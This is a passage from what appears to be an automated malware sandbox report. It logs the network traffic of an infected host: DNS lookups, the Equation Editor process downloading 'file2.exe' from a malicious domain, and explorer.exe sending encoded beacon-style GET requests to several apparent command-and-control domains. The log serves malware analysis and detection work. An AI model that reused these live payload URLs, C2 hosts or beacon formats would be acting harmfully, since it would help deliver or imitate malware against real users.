                                                                                                                                                              Jan 27, 2021 19:56:46.920511961 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920527935 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920536041 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.920557022 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920562029 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.920583963 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920589924 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.920608044 CET8049167185.26.106.165192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:56:46.920615911 CET4916780192.168.2.22185.26.106.165
                                                                                                                                                              Jan 27, 2021 19:56:46.920631886 CET8049167185.26.106.165192.168.2.22

                                                                                                                                                              UDP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jan 27, 2021 19:56:46.614939928 CET5219753192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 19:56:46.682864904 CET53521978.8.8.8192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:57:54.688999891 CET5309953192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 19:57:54.751688957 CET53530998.8.8.8192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:57:59.964924097 CET5283853192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 19:58:00.029746056 CET53528388.8.8.8192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:58:05.702882051 CET6120053192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 19:58:05.769166946 CET53612008.8.8.8192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:58:11.069504023 CET4954853192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 19:58:11.141540051 CET53495488.8.8.8192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:58:16.357805014 CET5562753192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 19:58:16.731750011 CET53556278.8.8.8192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:58:23.067120075 CET5600953192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 19:58:23.181525946 CET53560098.8.8.8192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:58:28.464946985 CET6186553192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 19:58:28.525895119 CET53618658.8.8.8192.168.2.22
                                                                                                                                                              Jan 27, 2021 19:58:33.673902988 CET5517153192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 19:58:34.753423929 CET5517153192.168.2.228.8.8.8

                                                                                                                                                              DNS Queries

                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                              Jan 27, 2021 19:56:46.614939928 CET192.168.2.228.8.8.80x3086Standard query (0)medicelcoolers.cnA (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:57:54.688999891 CET192.168.2.228.8.8.80xa14dStandard query (0)www.epicmassiveconcepts.comA (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:57:59.964924097 CET192.168.2.228.8.8.80xccffStandard query (0)www.gourmetgroceriesfast.comA (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:05.702882051 CET192.168.2.228.8.8.80x2e78Standard query (0)www.stattests.comA (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:11.069504023 CET192.168.2.228.8.8.80x2f03Standard query (0)www.brainandbodystrengthcoach.comA (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:16.357805014 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.alparmuhendislik.comA (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:23.067120075 CET192.168.2.228.8.8.80x6ec7Standard query (0)www.soundon.eventsA (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:28.464946985 CET192.168.2.228.8.8.80xf09aStandard query (0)www.arb-invest.comA (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:33.673902988 CET192.168.2.228.8.8.80x18f7Standard query (0)www.1033325.comA (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:34.753423929 CET192.168.2.228.8.8.80x18f7Standard query (0)www.1033325.comA (IP address)IN (0x0001)

                                                                                                                                                              DNS Answers

                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                              Jan 27, 2021 19:56:46.682864904 CET8.8.8.8192.168.2.220x3086No error (0)medicelcoolers.cn185.26.106.165A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:57:54.751688957 CET8.8.8.8192.168.2.220xa14dNo error (0)www.epicmassiveconcepts.comepicmassiveconcepts.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:57:54.751688957 CET8.8.8.8192.168.2.220xa14dNo error (0)epicmassiveconcepts.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:00.029746056 CET8.8.8.8192.168.2.220xccffNo error (0)www.gourmetgroceriesfast.comcustom-domain.appdrag.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:00.029746056 CET8.8.8.8192.168.2.220xccffNo error (0)custom-domain.appdrag.comdualstack.appdrag-883352178.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:00.029746056 CET8.8.8.8192.168.2.220xccffNo error (0)dualstack.appdrag-883352178.eu-west-1.elb.amazonaws.com52.209.107.24A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:00.029746056 CET8.8.8.8192.168.2.220xccffNo error (0)dualstack.appdrag-883352178.eu-west-1.elb.amazonaws.com52.51.72.229A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:05.769166946 CET8.8.8.8192.168.2.220x2e78No error (0)www.stattests.coms.multiscreensite.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:05.769166946 CET8.8.8.8192.168.2.220x2e78No error (0)s.multiscreensite.com100.24.208.97A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:05.769166946 CET8.8.8.8192.168.2.220x2e78No error (0)s.multiscreensite.com35.172.94.1A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:11.141540051 CET8.8.8.8192.168.2.220x2f03No error (0)www.brainandbodystrengthcoach.combrainandbodystrengthcoach.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:11.141540051 CET8.8.8.8192.168.2.220x2f03No error (0)brainandbodystrengthcoach.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:16.731750011 CET8.8.8.8192.168.2.220x3c4eNo error (0)www.alparmuhendislik.com23.105.124.225A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:23.181525946 CET8.8.8.8192.168.2.220x6ec7No error (0)www.soundon.eventsext-cust.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:23.181525946 CET8.8.8.8192.168.2.220x6ec7No error (0)ext-cust.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:23.181525946 CET8.8.8.8192.168.2.220x6ec7No error (0)ext-cust.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:23.181525946 CET8.8.8.8192.168.2.220x6ec7No error (0)ext-cust.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:23.181525946 CET8.8.8.8192.168.2.220x6ec7No error (0)ext-cust.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 19:58:28.525895119 CET8.8.8.8192.168.2.220xf09aName error (3)www.arb-invest.comnonenoneA (IP address)IN (0x0001)

                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                              • medicelcoolers.cn
                                                                                                                                                              • www.epicmassiveconcepts.com
                                                                                                                                                              • www.gourmetgroceriesfast.com
                                                                                                                                                              • www.stattests.com
                                                                                                                                                              • www.brainandbodystrengthcoach.com
                                                                                                                                                              • www.alparmuhendislik.com
                                                                                                                                                              • www.soundon.events

                                                                                                                                                              HTTP Packets

                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              0192.168.2.2249167185.26.106.16580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Jan 27, 2021 19:56:46.756223917 CET0OUTGET /file2.exe HTTP/1.1
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                              Host: medicelcoolers.cn
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Jan 27, 2021 19:56:46.810101032 CET1INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx
                                                                                                                                                              Date: Wed, 27 Jan 2021 18:56:46 GMT
                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                              Content-Length: 1012736
                                                                                                                                                              Last-Modified: Wed, 27 Jan 2021 14:49:13 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "60117d69-f7400"
                                                                                                                                                              X-Powered-By: PleskLin
                                                                                                                                                              Accept-Ranges: bytes


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              1192.168.2.224916834.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Jan 27, 2021 19:57:54.811652899 CET1074OUTGET /csv8/?l48tdRq0=iJ9LMG7JllwUjj0B/h8Hq4mQMyMQ8EbCXm6EYx1a/TSvaAWcoQp/LBKSuTwaNs+dq810vw==&RF=fra8 HTTP/1.1
                                                                                                                                                              Host: www.epicmassiveconcepts.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Jan 27, 2021 19:57:54.953263998 CET1074INHTTP/1.1 403 Forbidden
                                                                                                                                                              Server: openresty
                                                                                                                                                              Date: Wed, 27 Jan 2021 18:57:54 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 275
                                                                                                                                                              ETag: "600b4d54-113"
                                                                                                                                                              Via: 1.1 google
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              2192.168.2.224916952.209.107.2480C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Jan 27, 2021 19:58:00.407740116 CET1075OUTGET /csv8/?l48tdRq0=IHh69a0FaxwHJYII63MYWBmxiBy1jb1SBL9x5Wu2Yyk1poaJdqJtBcBB1goaFgg5VAJZAg==&RF=fra8 HTTP/1.1
                                                                                                                                                              Host: www.gourmetgroceriesfast.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Jan 27, 2021 19:58:00.697530031 CET1076INHTTP/1.1 404 Not Found
                                                                                                                                                              Date: Wed, 27 Jan 2021 18:58:00 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Content-Length: 5673
                                                                                                                                                              Connection: close
                                                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Expires: -1
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Server: AppDrag WebFront
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Set-Cookie: lng=en; path=/; Expires=Fri, 26 Feb 2021 18:58:00 GMT;SameSite=Lax;
                                                                                                                                                              X-Cloud-Cache: 0
                                                                                                                                                              X-Cloud-Storage-Cache: 0
                                                                                                                                                              Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With, Cache-Control, Accept, Origin, X-Session-ID
                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, PUT, PATCH, DELETE, OPTIONS
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 73 33 2d 65 75 2d 77 65 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 64 65 76 2e 61 70 70 64 72 61 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 2d 70 72 65 76 69 65 77 2f 63 6f 6e 66 69 67 2f 69 6e 64 65 78 2e 6a 70 67 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6c 61 73 73 3d 22 61 70 70 64 72 61 67 2d 6f 67 2d 69 6d 61 67 65 2d 77 69 64 74 68 2d 61 6e 64 2d 68 65 69 67 68 74 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 77 69 64 74 68 22 20 63 6f 6e 74 65 6e 74 3d 22 34 35 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6c 61 73 73 3d 22 61 70 70 64 72 61 67 2d 6f 67 2d 69 6d 61 67 65 2d 77 69 64 74 68 2d 61 6e 64 2d 68 65 69 67 68 74 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 68 65 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 32 33 36 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 6c 61 73 73 3d 22 61 70 70 64 72 61 67 2d 74 68 65 6d 65 2d 74 6f 70 62 61 72 2d 63 6f 6c 6f 72 22 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 64 35 61 39 36 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6c 61 73 73 3d 22 61 70 70 64 72 61 67 2d 74 68 65 6d 65 2d 74 6f 70 62 61 72 2d 63 6f 6c 6f 72 22 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 76 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 64 35 61 39 36 22 3e 0a 20 20 20 20
                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport"> <title>Page not found - 404 Error</title> <meta property="og:image" content="http://s3-eu-west-1.amazonaws.com/dev.appdrag.com/template-preview/config/index.jpg"> <meta class="appdrag-og-image-width-and-height" property="og:image:width" content="450"> <meta class="appdrag-og-image-width-and-height" property="og:image:height" content="236"> <meta class="appdrag-theme-topbar-color" name="theme-color" content="#1d5a96"> <meta class="appdrag-theme-topbar-color" name="msapplication-navbutton-color" content="#1d5a96">


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              3192.168.2.2249170100.24.208.9780C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Jan 27, 2021 19:58:05.898938894 CET1082OUTGET /csv8/?l48tdRq0=SBCaTdpk9GFN+fS4Ft/T56OwK5/x5qMPVVvaK278SLjI2qusdtII6CngZJh83HH0bt2tCA==&RF=fra8 HTTP/1.1
                                                                                                                                                              Host: www.stattests.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Jan 27, 2021 19:58:06.025470018 CET1083INHTTP/1.1 403 Forbidden
                                                                                                                                                              Server: nginx
                                                                                                                                                              Date: Wed, 27 Jan 2021 18:58:05 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 146
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              4192.168.2.224917134.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Jan 27, 2021 19:58:11.187953949 CET1084OUTGET /csv8/?l48tdRq0=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&RF=fra8 HTTP/1.1
                                                                                                                                                              Host: www.brainandbodystrengthcoach.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Jan 27, 2021 19:58:11.328413010 CET1084INHTTP/1.1 403 Forbidden
                                                                                                                                                              Server: openresty
                                                                                                                                                              Date: Wed, 27 Jan 2021 18:58:11 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 275
                                                                                                                                                              ETag: "600b4d5c-113"
                                                                                                                                                              Via: 1.1 google
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              5192.168.2.224917223.105.124.22580C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Jan 27, 2021 19:58:16.926639080 CET1085OUTGET /csv8/?l48tdRq0=qrM/jq4LcG9rGmd8GV9Oj1wgtu+jolIiSWn3/swEVCZ8jKRp1GYmoG9veOaFoBSGv/vRuA==&RF=fra8 HTTP/1.1
                                                                                                                                                              Host: www.alparmuhendislik.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              6192.168.2.2249173198.185.159.14480C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Jan 27, 2021 19:58:23.310626030 CET1086OUTGET /csv8/?l48tdRq0=f1zFyjN0EmLviNF8fKKCz7YQnzvARTiViS3XLvwk6t41gXJpQ0SRSkWjGn1VRBwYOzEhaA==&RF=fra8 HTTP/1.1
                                                                                                                                                              Host: www.soundon.events
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Jan 27, 2021 19:58:23.439745903 CET1087INHTTP/1.1 400 Bad Request
                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                              Content-Length: 77564
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Date: Wed, 27 Jan 2021 18:58:23 UTC
                                                                                                                                                              Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Server: Squarespace
                                                                                                                                                              X-Contextid: wYZtlBX5/okrSA3sg
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
